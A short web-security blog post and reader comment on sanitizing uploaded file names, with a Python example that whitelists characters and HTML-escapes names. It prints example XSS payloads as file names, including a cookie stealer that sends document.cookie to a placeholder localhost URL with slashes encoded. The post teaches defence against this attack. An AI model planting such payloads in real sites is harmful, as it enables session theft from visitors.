Web Security: File Names
One important thing to remember when it comes to developing web applications is that you can never trust any of your users in any case. Humans are cruel; it's not unlikely someone will try to crawl their way into your server or database.
When developing attachment, file upload, or similar systems, always remember to sanitize the file name.
Of course, modern computer systems don't allow slashes in a file name, so the following wouldn't work:
<body>hacked</body>.txt
Systems just don't like that: the slash is reserved as a path separator, so you cannot use it in file names. But a specially crafted file name that avoids slashes can still be uploaded, and if your application later writes that name into a page without escaping it, the markup runs in the visitor's browser and can be used to steal cookies, redirect users, or modify the current page to the attacker's liking.
Examples:
// Simple alert
<body onload=alert(Hacked)>.txt
// Cookie stealer
<body onload=location.href="http:"+String.fromCharCode(47)+String.fromCharCode(47)+"localhost"+String.fromCharCode(47)+"test.php?data="+escape(document.cookie)>.txt
// etc
ALWAYS sanitize the file name. Keep yourself and your users safe. :)
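Here is one way to do that, as an added example that is not part of the original tip. It treats the two problems separately: the name used on disk is reduced to a small whitelist of characters with any directory part removed, and the name shown back to users is HTML-escaped at output time. The function names, the whitelist and the length limit are choices made for this example, not anything the tip prescribes.

```python
import html
import os
import re

# Characters allowed in a stored file name: letters, digits, dot, dash, underscore.
# Everything else (spaces, quotes, angle brackets, control characters) is replaced.
_UNSAFE_CHARS = re.compile(r"[^A-Za-z0-9._-]")
# Arbitrary upper bound chosen for this example; file systems and databases have their own.
MAX_NAME_LEN = 100


def sanitize_filename(name: str) -> str:
    """Return a name that is safe to use on disk: no path components, no markup."""
    # Drop any directory part the client sent, whichever separator it used.
    name = name.replace("\\", "/").split("/")[-1]
    # Replace every character outside the whitelist with an underscore.
    name = _UNSAFE_CHARS.sub("_", name)
    # Collapse runs of underscores, then strip leading/trailing dots and underscores
    # so the result cannot be hidden (".bashrc"), a traversal component ("..") or empty.
    name = re.sub(r"_+", "_", name).strip("._")
    if not name:
        name = "upload"
    # Truncate the stem rather than the extension if the name is too long.
    if len(name) > MAX_NAME_LEN:
        stem, ext = os.path.splitext(name)
        name = stem[: MAX_NAME_LEN - len(ext)] + ext
    return name


def display_filename(name: str) -> str:
    """Escape a file name for insertion into HTML text or an attribute value."""
    return html.escape(name, quote=True)


if __name__ == "__main__":
    # Constructed inputs, including the tip's own example name.
    for raw in ["<body onload=alert(Hacked)>.txt", "../../secret.txt", "..", "report 2023.pdf"]:
        print(repr(raw), "->", sanitize_filename(raw), "|", display_filename(raw))
```

Escaping at output is still needed even with a sanitized disk name, because you will usually want to show the original name the user typed; store that as plain metadata and escape it every time it is rendered. A common further step is to ignore the client's name for storage entirely and save the file under a generated identifier, keeping the sanitized name only for downloads.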
Written by Nathan Malcolm
1 Response
I couldn't agree more with you; I wish I had mentioned this in my Pro Tip about sanitizing variables.
The only one thing I can add is HOW:
a) htmlspecialchars()
b) strip_tags()
c) stripslashes() / addslashes()
d) mysql_real_escape_string()
e) htmlentities()
And, to be honest, hundreds more methods of sanitizing data.
Awesome post.